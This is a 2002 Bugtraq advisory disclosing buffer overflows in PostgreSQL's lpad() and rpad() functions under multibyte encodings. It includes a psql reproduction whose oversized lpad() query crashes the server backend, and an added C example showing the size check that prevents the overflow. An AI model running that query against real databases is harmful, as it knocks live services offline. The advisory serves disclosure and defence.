@(#)Mordred Labs advisory 0x0004: Multiple buffer overflows in PostgreSQL.

From: Sir Mordred The Traitor (mordred@s-mail.com)
Date: 08/20/02


Date: Tue, 20 Aug 2002 15:01:34 +0000
From: Sir Mordred The Traitor <mordred@s-mail.com>
To: bugtraq@securityfocus.com


//@(#) Mordred Labs advisory 0x0004

Release date: 20/08/02
Name: Two buffer overflows in PostgreSQL
Versions affected: all versions
Conditions: multibyte support
Risk: average

--[ Description:

I guess all of you have already heard about PostgreSQL.
If not, see
http://www.postgresql.org/idocs/index.php?preface.html#INTRO-WHATIS.

There are two buffer overflows in src/backend/utils/adt/oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function

--[ Details:

The code for these functions is in
src/backend/utils/adt/oracle_compat.c::lpad() and
src/backend/utils/adt/oracle_compat.c::rpad() respectively.
The code suffers from a buffer overflow (of course).

--[ How to reproduce:

shell> pgsql template1 postgres
template1=# select version();
                          version
-----------------------------------------------------------
 PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)

template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1# \c my_db
You are now connected to database my_db.

my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
        This probably means the backend terminated abnormally
        before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#

The same applies to the rpad() function.

The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE,
MULE_INTERNAL.
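The following is an added example, not code from the advisory or from PostgreSQL. It models how a padding routine for a multibyte encoding sizes its output buffer (requested character count times the encoding's maximum bytes per character) and shows the check a defender expects in front of that multiplication; that this is the mechanism behind the crash above is an assumption, but the arithmetic itself is exact: the advisory's length 1431655765 times 3 bytes per character wraps a 32-bit product to 0xFFFFFFFF. The allocation cap and the function names are constructed for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed per-request allocation cap standing in for the backend's. */
#define MAX_ALLOC_BYTES 0x3fffffffL

/* Model of an unchecked byte budget: character count times the maximum
 * bytes per character of the encoding. Done in uint32_t so the wrap-around
 * is well defined here; 1431655765 * 3 wraps to 0xFFFFFFFF. */
uint32_t pad_bytes_unchecked(uint32_t len, uint32_t max_char_len)
{
    return len * max_char_len;
}

/* Hardened budget: reject negative lengths and any product that would
 * exceed the cap, tested by division so the multiplication cannot wrap. */
bool pad_bytes_checked(int32_t len, int32_t max_char_len, int32_t *out)
{
    if (len < 0 || max_char_len < 1 || max_char_len > 4)
        return false;
    if (len > MAX_ALLOC_BYTES / max_char_len)
        return false;
    *out = len * max_char_len;
    return true;
}

/* Left-pad src with fill up to len characters (ASCII only, so one byte per
 * character; the allocation still uses max_char_len as a multibyte path
 * would). Truncates when len < strlen(src). Returns a malloc'd string, or
 * NULL when the request is rejected by the size check. */
char *lpad_safe(const char *src, int32_t len, const char *fill, int32_t max_char_len)
{
    int32_t budget;
    size_t slen = strlen(src), flen = strlen(fill), i;
    if (flen == 0 || !pad_bytes_checked(len, max_char_len, &budget))
        return NULL;
    char *out = malloc((size_t)budget + 1);
    if (out == NULL)
        return NULL;
    if ((size_t)len <= slen) {             /* nothing to pad: truncate */
        memcpy(out, src, (size_t)len);
        out[len] = '\0';
        return out;
    }
    size_t npad = (size_t)len - slen;
    for (i = 0; i < npad; i++)             /* cycle through the fill string */
        out[i] = fill[i % flen];
    memcpy(out + npad, src, slen);
    out[len] = '\0';
    return out;
}
```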

--[ Solution

Secure coding of web applications, input validation checks, etc.
